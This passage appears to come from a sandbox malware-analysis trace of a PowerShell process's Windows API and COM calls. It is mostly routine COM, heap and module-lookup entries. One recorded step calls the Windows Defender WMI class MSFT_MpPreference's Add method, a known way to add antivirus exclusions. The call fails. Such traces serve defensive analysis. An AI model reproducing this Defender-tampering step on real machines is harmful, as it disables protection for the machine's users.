Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5ce9f0 | out: ppvObject=0x1a5ce9f0*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a838*(Data1=0xbfd60505, Data2=0x5a1f, Data3=0x4e41, Data4=([0]=0x88, [1]=0xba, [2]=0xa6, [3]=0xfb, [4]=0x7, [5]=0x20, [6]=0x2d, [7]=0xa9)), ppvObject=0x1a5ce9b0 | out: ppvObject=0x1a5ce9b0*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5ce9f8 | out: ppvObject=0x1a5ce9f8*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x143715d9, Data2=0xa015, Data3=0x40ea, Data4=([0]=0xb6, [1]=0x95, [2]=0xd5, [3]=0xcc, [4]=0x26, [5]=0x7e, [6]=0x36, [7]=0xee)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0xd6defab3, Data2=0xdbb9, Data3=0x4413, Data4=([0]=0x8a, [1]=0xf9, [2]=0x55, [3]=0x45, [4]=0x86, [5]=0xfd, [6]=0xff, [7]=0x94)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0xea5d0de4, Data2=0x770d, Data3=0x4da0, Data4=([0]=0xa9, [1]=0xf8, [2]=0xd7, [3]=0xf9, [4]=0xa1, [5]=0x40, [6]=0xff, [7]=0x79)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x816e5b3e, Data2=0x5523, Data3=0x4efc, Data4=([0]=0x92, [1]=0x23, [2]=0x98, [3]=0xec, [4]=0x42, [5]=0x14, [6]=0xc3, [7]=0xa0)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x3c169ff7, Data2=0x37b2, Data3=0x484c, Data4=([0]=0xb1, [1]=0x99, [2]=0xc3, [3]=0x15, [4]=0x55, [5]=0x90, [6]=0xf3, [7]=0x16)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x4f4f92b5, Data2=0x6ded, Data3=0x4e9b, Data4=([0]=0xa9, [1]=0x3f, [2]=0x1, [3]=0x38, [4]=0x91, [5]=0xb3, [6]=0xa8, [7]=0xb7)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x9bc79c93, Data2=0x2289, Data3=0x4bb5, Data4=([0]=0xab, [1]=0xf4, [2]=0x32, [3]=0x87, [4]=0xfd, [5]=0x9c, [6]=0xae, [7]=0x39)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x1868091e, Data2=0xab5a, Data3=0x415f, Data4=([0]=0xa0, [1]=0x2f, [2]=0x5c, [3]=0x4d, [4]=0xd0, [5]=0xcf, [6]=0x90, [7]=0x1d)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x11456f96, Data2=0x9d1, Data3=0x4909, Data4=([0]=0x8f, [1]=0x36, [2]=0x4e, [3]=0xb7, [4]=0x4e, [5]=0x42, [6]=0xb9, [7]=0x3e)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x1ac7516e, Data2=0xe6bb, Data3=0x4a69, Data4=([0]=0xb6, [1]=0x3f, [2]=0xe8, [3]=0x41, [4]=0x90, [5]=0x4d, [6]=0xc5, [7]=0xa6)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0x35bd3360, Data2=0x1b35, Data3=0x4927, Data4=([0]=0xba, [1]=0xe4, [2]=0xb1, [3]=0xe, [4]=0x70, [5]=0xd9, [6]=0x9e, [7]=0xff)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1a5cea60*(Data1=0xf2153260, Data2=0x232e, Data3=0x4474, Data4=([0]=0x9d, [1]=0xa, [2]=0x9f, [3]=0x2a, [4]=0xb1, [5]=0x53, [6]=0x44, [7]=0x1d)), ppvObject=0x1a5ce988 | out: ppvObject=0x1a5ce988*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5cea08 | out: ppvObject=0x1a5cea08*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a878*(Data1=0x3fb5c57, Data2=0xd534, Data3=0x45f5, Data4=([0]=0xa1, [1]=0xf4, [2]=0xd3, [3]=0x95, [4]=0x56, [5]=0x98, [6]=0x38, [7]=0x75)), ppvObject=0x1a5ce9a8 | out: ppvObject=0x1a5ce9a8*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1dd78*(Data1=0x334d391f, Data2=0xe79, Data3=0x3b15, Data4=([0]=0xc9, [1]=0xff, [2]=0xea, [3]=0xc6, [4]=0x5d, [5]=0xd0, [6]=0x7c, [7]=0x42)), ppvObject=0x1a5cea10 | out: ppvObject=0x1a5cea10*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a868*(Data1=0x2c258ae7, Data2=0x50dc, Data3=0x49ff, Data4=([0]=0x9d, [1]=0x1d, [2]=0x2e, [3]=0xcb, [4]=0x9a, [5]=0x52, [6]=0xcd, [7]=0xd7)), ppvObject=0x1a5ce9a0 | out: ppvObject=0x1a5ce9a0*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a898*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1ad15b18 | out: ppvObject=0x1ad15b18*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffcbe1a858*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x1a5ce998 | out: ppvObject=0x1a5ce998*=0x0) returned 0x80004002 [0289.289] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x4 [0289.291] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1a80f260) returned 0x5 [0289.291] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x1acee728*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1a5cf150 | out: ppvObject=0x1a5cf150*=0x1a80f260) returned 0x0 [0289.291] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x5 [0289.292] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffbdc55478*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1a5cf1f0 | out: ppvObject=0x1a5cf1f0*=0x1a80f260) returned 0x0 [0289.301] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad46a38 | out: ppvObject=0x1ad46a38*=0x1a80f260) returned 0x0 [0289.302] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad4f570 | out: ppvObject=0x1ad4f570*=0x1a80f260) returned 0x0 [0289.302] PublishDebugMessage () returned 0x1 [0289.302] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x1ad5bd58) returned 0x2 [0289.302] CreateConversionContext () returned 0x0 [0289.302] GetProcessHeap () returned 0x530000 [0289.302] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace71b0 [0289.303] GetMethodParameters () returned 0x0 [0289.303] GetCurrentThreadId () returned 0x588 [0289.303] PublishDebugMessage () returned 0x1 [0289.303] WbemLocator:IUnknown:AddRef (This=0x1ace6bd0) returned 0x2 [0289.303] GetProcessHeap () returned 0x530000 [0289.303] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad526f0 [0289.303] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0289.303] _wcsicmp (_String1="root/Microsoft/Windows/Defender", _String2="root/Microsoft/Windows/Defender") returned 0 [0289.303] WbemLocator:IUnknown:AddRef (This=0x1a8cadd0) returned 0x3 [0289.303] GetProcessHeap () returned 0x530000 [0289.304] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad526f0) returned 1 [0289.304] PublishDebugMessage () returned 0x1 [0289.304] WbemLocator:IUnknown:Release (This=0x1ace6bd0) returned 0x1 [0289.464] GetProcessHeap () returned 0x530000 [0289.464] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace71b0) returned 1 [0289.464] ParametersToWMIObject () returned 0x0 [0289.467] SetModifiedPropertyNamesToContext () returned 0x0 [0289.467] GetCurrentProcessId () returned 0xd0c [0289.467] PublishClientOperationInfo () returned 0x0 [0289.467] PublishDebugMessage () returned 0x1 [0289.467] GetProcessHeap () returned 0x530000 [0289.467] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace6b70 [0289.467] IWbemServices:ExecMethodAsync (This=0x1a8cadd0, strObjectPath="MSFT_MpPreference", strMethodName="Add", lFlags=0, pCtx=0x1a866580, pInParams=0x1ad36f90, pResponseHandler=0x1ad5bd58) returned 0x0 [0289.467] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5998*(Data1=0x4963311, Data2=0xc399, Data3=0x408e, Data4=([0]=0xad, [1]=0x51, [2]=0x5, [3]=0xd0, [4]=0x15, [5]=0x6, [6]=0xee, [7]=0xd0)), ppvObject=0x1a5cf090 | out: ppvObject=0x1a5cf090*=0x0) returned 0x80004002 [0289.468] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x60a100*(Data1=0x7c857801, Data2=0x7381, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1a5cdb90 | out: ppvObject=0x1a5cdb90*=0x1a80f260) returned 0x0 [0289.473] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad46df8 | out: ppvObject=0x1ad46df8*=0x1a80f260) returned 0x0 [0289.473] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad4efb0 | out: ppvObject=0x1ad4efb0*=0x1a80f260) returned 0x0 [0289.666] GetProcessHeap () returned 0x530000 [0289.666] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6b70) returned 1 [0289.666] PublishDebugMessage () returned 0x1 [0289.666] IUnknown:Release (This=0x1ad36f90) returned 0x0 [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1ad5bd58) returned 0x1 [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1ad5bd58) returned 0x0 [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0xa [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x9 [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x8 [0289.666] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x7 [0289.666] CoUninitialize () [0289.668] GetCurrentThreadId () returned 0x588 [0289.668] GetProcessHeap () returned 0x530000 [0289.668] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6240) returned 1 [0289.668] SetThreadToken (Thread=0x0, Token=0x0) returned 1 [0289.668] PublishDebugMessage () returned 0x1 [0291.796] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x60a178*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1a5cd630 | out: ppvObject=0x1a5cd630*=0x1a80f260) returned 0x0 [0291.796] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad449b8 | out: ppvObject=0x1ad449b8*=0x1a80f260) returned 0x0 [0291.796] StdGlobalInterfaceTable:IUnknown:QueryInterface (in: This=0x1a80f260, riid=0x7fffb48d5400*(Data1=0xe7d35cfa, Data2=0x348b, Data3=0x485e, Data4=([0]=0xb5, [1]=0x24, [2]=0x25, [3]=0x27, [4]=0x25, [5]=0xd6, [6]=0x97, [7]=0xca)), ppvObject=0x1ad4f130 | out: ppvObject=0x1ad4f130*=0x1a80f260) returned 0x0 [0292.798] StdGlobalInterfaceTable:IWbemObjectSink:SetStatus (This=0x1a80f260, lFlags=0, hResult=0xffffffff80041001, strParam=0x0, pObjParam=0x1acbbda0) returned 0x0 [0292.798] PublishDebugMessage () returned 0x1 [0292.798] GetCurrentThreadId () returned 0x588 [0292.798] GetProcessHeap () returned 0x530000 [0292.798] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ad56e50 [0292.798] WMIExtendedObjectToInstance () returned 0x0 [0292.798] _wcsicmp (_String1="MSFT_WmiError", _String2="CIM_Error") returned 10 [0292.799] _wcsicmp (_String1="MSFT_WmiError", _String2="__Parameters") returned 14 [0292.799] _wcsicmp (_String1="MSFT_WmiError", _String2="__ExtendedStatus") returned 14 [0292.799] ?GetMiClass@DynamicSchema@@UEAAJPEBG00PEAPEBU_MI_Class@@@Z () returned 0x80041002 [0292.799] ClassCache_GetClass () returned 0x0 [0292.799] ResultToHRESULT () returned 0x0 [0292.799] Instance_New () returned 0x0 [0292.799] ResultToHRESULT () returned 0x0 [0292.799] ResultToHRESULT () returned 0x0 [0292.799] PublishDebugMessage () returned 0x1 [0292.799] ResultFromHRESULT () returned 0x1 [0292.799] PublishDebugMessage () returned 0x1 [0292.813] GetCurrentThread () returned 0xfffffffffffffffe [0292.814] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0292.814] SetThreadToken (Thread=0x1a5cd588*=0xfffffffffffffffe, Token=0x0) returned 1 [0292.823] PublishDebugMessage () returned 0x1 [0292.823] CreateThreadpoolWork (in: pfnwk=0x7fffbdc42060, pv=0x1a81aaf0, pcbe=0x0 | out: pv=0x1a81aaf0) returned 0x1a85d270 [0292.823] TpPostWork () returned 0x3 [0292.823] MI_OperationWrapper_ScheduleDrainingWorkIfNeeded () returned 0x7fffbb531a20 [0292.823] MI_OperationWrapper_DecrementCount_AndDontWorryAboutLifetimeOfMiDotNetDll () returned 0x2 [0292.824] SetThreadToken (Thread=0x1a5cd588*=0xfffffffffffffffe, Token=0x87c) returned 1 [0292.834] CloseHandle (hObject=0x87c) returned 1 [0292.842] malloc (_Size=0x120) returned 0x81b3c0 [0292.842] MI_OperationWrapper_Initialize () returned 0x0 [0292.843] MI_OperationWrapper_SetupDrainingIfNeeded () returned 0x0 [0292.843] PublishDebugMessage () returned 0x1 [0292.843] PublishDebugMessage () returned 0x1 [0292.843] GetProcessHeap () returned 0x530000 [0292.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1d8) returned 0x1a819bf0 [0292.843] ??0DynamicSchema@@QEAA@XZ () returned 0x1a819db8 [0292.843] GetCorrelationId () returned 0x0 [0292.843] CreateThreadpoolWork (in: pfnwk=0x7fffbdc39d10, pv=0x1a819bf0, pcbe=0x0 | out: pv=0x1a819bf0) returned 0x1a85cc70 [0292.843] GetProcessHeap () returned 0x530000 [0292.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x16) returned 0x1ace6e10 [0292.843] memcpy (in: _Dst=0x1ace6e10, _Src=0x7fffbdc506e0, _Size=0x16 | out: _Dst=0x1ace6e10) returned 0x1ace6e10 [0292.843] GetTickCount64 () returned 0x123dd29 [0292.843] GetProcessHeap () returned 0x530000 [0292.843] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x1ace6ff0 [0292.843] PublishDebugMessage () returned 0x1 [0292.843] TpPostWork () returned 0x3 [0292.843] PublishDebugMessage () returned 0x1 [0292.844] MI_OperationWrapper_GetInstance () returned 0x0 [0293.013] GetCurrentThread () returned 0xfffffffffffffffe [0293.013] MI_Helpers_GetCurrentSecurityToken () returned 0x0 [0293.014] SetThreadToken (Thread=0x1a5ccfa8*=0xfffffffffffffffe, Token=0x87c) returned 1 [0293.014] MI_OperationWrapper_ScheduleDrainingWorkIfNeeded () returned 0x3 [0293.015] MI_OperationWrapper_DecrementCount_AndDontWorryAboutLifetimeOfMiDotNetDll () returned 0x2 [0293.015] SetThreadToken (Thread=0x1a5ccfa8*=0xfffffffffffffffe, Token=0x880) returned 1 [0293.015] CloseHandle (hObject=0x880) returned 1 [0293.019] GetComputerNameW (in: lpBuffer=0x1a5cd1d0, nSize=0x1a5cd4f8 | out: lpBuffer="PXTHFFRYO7", nSize=0x1a5cd4f8) returned 1 [0293.019] EtwEventWriteTransfer () returned 0x0 [0293.024] EtwEventWriteTransfer () returned 0x0 [0293.026] SetEvent (hEvent=0x348) returned 1 [0293.026] SetEvent (hEvent=0x278) returned 1 [0293.027] RtlInterlockedWakeAll () returned 0x0 [0293.027] PublishDebugMessage () returned 0x1 [0293.027] PublishDebugMessage () returned 0x1 [0293.027] GetCurrentThreadId () returned 0x588 [0293.027] GetProcessHeap () returned 0x530000 [0293.028] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad56e50) returned 1 [0293.028] GetProcessHeap () returned 0x530000 [0293.028] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x1ad57120 [0293.028] GetProcessHeap () returned 0x530000 [0293.028] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x40) returned 0x1ad52e70 [0293.028] GetProcessHeap () returned 0x530000 [0293.028] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x1ace71b0 [0293.028] SetEvent (hEvent=0x7fc) returned 1 [0293.028] GetProcessHeap () returned 0x530000 [0293.028] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6090) returned 1 [0293.028] TpReleaseWork () returned 0x1 [0293.028] TpReleaseWork () returned 0x1 [0293.029] GetProcessHeap () returned 0x530000 [0293.029] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a86f620) returned 1 [0293.029] GetProcessHeap () returned 0x530000 [0293.029] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a8ca730) returned 1 [0293.029] GetProcessHeap () returned 0x530000 [0293.030] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace6300) returned 1 [0293.030] GetProcessHeap () returned 0x530000 [0293.030] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a8f58c0) returned 1 [0293.030] GetProcessHeap () returned 0x530000 [0293.030] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ace7230) returned 1 [0293.030] PublishDebugMessage () returned 0x1 [0293.030] PublishDebugMessage () returned 0x1 [0293.030] GetProcessHeap () returned 0x530000 [0293.030] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1a81aaf0) returned 1 [0293.031] PublishDebugMessage () returned 0x1 Thread: id = 220 os_tid = 0xc80 [0287.859] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0287.859] CoCreateInstance (in: rclsid=0x7fffbdc49a38*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc4a450*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a85c260 | out: ppv=0x1a85c260*=0x7fffcbe91a68) returned 0x0 [0287.860] CoCreateInstance (in: rclsid=0x7fffbdc4a470*(Data1=0x34e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fffbdc4a440*(Data1=0x1da, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1a85c258 | out: ppv=0x1a85c258*=0x1ace8910) returned 0x0 [0287.860] SetEvent (hEvent=0x7f0) returned 1 [0287.882] WaitForSingleObject (hHandle=0x7fc, dwMilliseconds=0xffffffff) returned 0x0 [0293.031] WbemLocator:IUnknown:Release (This=0x1a8cadd0) returned 0x1 [0293.031] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fffcbe91a68, dwCookie=0x201) returned 0x0 [0293.031] StdGlobalInterfaceTable:IUnknown:Release (This=0x1a80f260) returned 0x9 [0293.031] ResultFromHRESULT () returned 0x0 [0293.031] WbemContext:IUnknown:Release (This=0x1a866580) returned 0x0 [0293.031] GetProcessHeap () returned 0x530000 [0293.032] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad57120) returned 1 [0293.032] WaitForSingleObject (hHandle=0x7fc, dwMilliseconds=0xffffffff) returned 0x0 [0306.732] WbemLocator:IUnknown:Release (This=0x1ad7da70) returned 0x1 [0306.732] GetProcessHeap () returned 0x530000 [0306.733] RtlFreeHeap (HeapHandle=0x530000, Flags=0x0, BaseAddress=0x1ad57210) returned 1 [0306.733] WaitForSingleObject (hHandle=0x7fc, dwMilliseconds=0xffffffff) returned 0x0 [0312.909] WbemLocator:IUnknown:Release (This=0x1a8cadd0) Thread: id = 221 os_tid = 0x5ec [0273.093] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x1a6ff648 | out: UnbiasedTime=0x1a6ff648) returned 1 [0273.096] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility\\PSWorkflowUtility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility\\psworkflowutility.psd1")) returned 0x20 [0273.098] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\StorageBusCache\\StorageBusCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storagebuscache\\storagebuscache.psd1")) returned 0x20 [0273.100] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20 [0273.108] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsUpdate\\WindowsUpdate.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowsupdate\\windowsupdate.psd1")) returned 0x20 [0273.109] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0273.113] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DeliveryOptimization\\DeliveryOptimization.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\deliveryoptimization\\deliveryoptimization.psd1")) returned 0x20 [0273.114] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0273.115] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1")) returned 0x20 [0273.118] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1")) returned 0x20 [0273.121] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psm1")) returned 0x20 [0273.121] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\2.0.0\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\2.0.0\\psreadline.psd1")) returned 0x20 [0273.121] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsDeveloperLicense\\WindowsDeveloperLicense.psd1" (normalized: 